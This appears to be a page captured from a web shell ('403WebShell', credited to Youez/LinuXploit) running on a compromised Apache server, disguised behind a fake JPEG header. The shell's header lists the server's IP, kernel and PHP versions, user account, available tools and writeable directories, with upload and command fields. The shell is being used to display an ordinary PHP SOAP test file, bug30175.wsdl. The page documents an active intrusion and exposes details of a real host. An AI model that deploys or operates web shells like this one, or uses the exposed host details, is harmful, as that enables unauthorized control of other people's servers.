????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.139.59.149
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/home/b8009/php-5.6.22/ext/soap/tests/bugs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/home/b8009/php-5.6.22/ext/soap/tests/bugs/bug30175.wsdl
<?xml version="1.0" encoding="UTF-8"?>
<definitions name="qweb"
 targetNamespace="http://www.newsblob.com/qweb.wsdl"
 xmlns:tns="http://www.newsblob.com/qweb.wsdl"
 xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
 xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 xmlns:xsd="http://www.w3.org/2001/XMLSchema"
 xmlns:ns1="urn:qweb"
 xmlns:SOAP="http://schemas.xmlsoap.org/wsdl/soap/"
 xmlns:WSDL="http://schemas.xmlsoap.org/wsdl/"
 xmlns="http://schemas.xmlsoap.org/wsdl/">

<types>

 <schema targetNamespace="urn:qweb"
  xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xmlns:xsd="http://www.w3.org/2001/XMLSchema"
  xmlns:ns1="urn:qweb"
  xmlns="http://www.w3.org/2001/XMLSchema"
  elementFormDefault="unqualified"
  attributeFormDefault="unqualified">
  <import namespace="http://schemas.xmlsoap.org/soap/encoding/"/>
  <complexType name="qwebGetHostInfoResponse">
   <sequence>
    <element name="return" type="ns1:HostInfo" minOccurs="1" maxOccurs="1"/>
   </sequence>
  </complexType>
  <complexType name="ArrayOfHostInfo">
   <complexContent>
    <restriction base="SOAP-ENC:Array">
     <sequence>
      <element name="item" type="ns1:HostInfo" minOccurs="0" maxOccurs="unbounded"/>
     </sequence>
     <attribute ref="SOAP-ENC:arrayType" WSDL:arrayType="ns1:HostInfo[]"/>
    </restriction>
   </complexContent>
  </complexType>
 </schema>

</types>

<message name="qwebSquareRequest">
 <part name="mynum" type="xsd:int"/>
</message>

<message name="qwebSquareResponse">
 <part name="result" type="xsd:int"/>
</message>

<message name="qwebStrlenRequest">
 <part name="mystr" type="xsd:string"/>
</message>

<message name="qwebStrlenResponse">
 <part name="result" type="xsd:int"/>
</message>

<message name="qwebGetHostInfoRequest">
</message>

<message name="HostInfo">
 <part name="name" type="xsd:string"/>
 <part name="shortDescription" type="xsd:string"/>
 <part name="ipAddress" type="xsd:string"/>
</message>

<portType name="qwebPortType">
 <operation name="qwebSquare">
  <documentation>Service definition of function ns1__qwebSquare</documentation>
  <input message="tns:qwebSquareRequest"/>
  <output message="tns:qwebSquareResponse"/>
 </operation>
 <operation name="qwebStrlen">
  <documentation>Service definition of function ns1__qwebStrlen</documentation>
  <input message="tns:qwebStrlenRequest"/>
  <output message="tns:qwebStrlenResponse"/>
 </operation>
 <operation name="qwebGetHostInfo">
  <documentation>Service definition of function ns1__qwebGetHostInfo</documentation>
  <input message="tns:qwebGetHostInfoRequest"/>
  <output message="tns:HostInfo"/>
 </operation>
</portType>

<binding name="qweb" type="tns:qwebPortType">
 <SOAP:binding style="rpc" transport="http://schemas.xmlsoap.org/soap/http"/>
 <operation name="qwebSquare">
  <SOAP:operation style="rpc" soapAction=""/>
  <input>
   <SOAP:body use="encoded" namespace="urn:qweb" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
  </input>
  <output>
   <SOAP:body use="encoded" namespace="urn:qweb" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
  </output>
 </operation>
 <operation name="qwebStrlen">
  <SOAP:operation style="rpc" soapAction=""/>
  <input>
   <SOAP:body use="encoded" namespace="urn:qweb" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
  </input>
  <output>
   <SOAP:body use="encoded" namespace="urn:qweb" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
  </output>
 </operation>
 <operation name="qwebGetHostInfo">
  <SOAP:operation style="rpc" soapAction=""/>
  <input>
   <SOAP:body use="encoded" namespace="urn:qweb" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
  </input>
  <output>
   <SOAP:body use="encoded" namespace="urn:qweb" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
  </output>
 </operation>
</binding>

<service name="qweb">
 <documentation>Demo Qweb SOAP interface</documentation>
 <port name="qweb" binding="tns:qweb">
  <SOAP:address location="http://www.newsblob.com:6969"/>
 </port>
</service>

</definitions>

Youez - 2016 - github.com/yon3zu
LinuXploit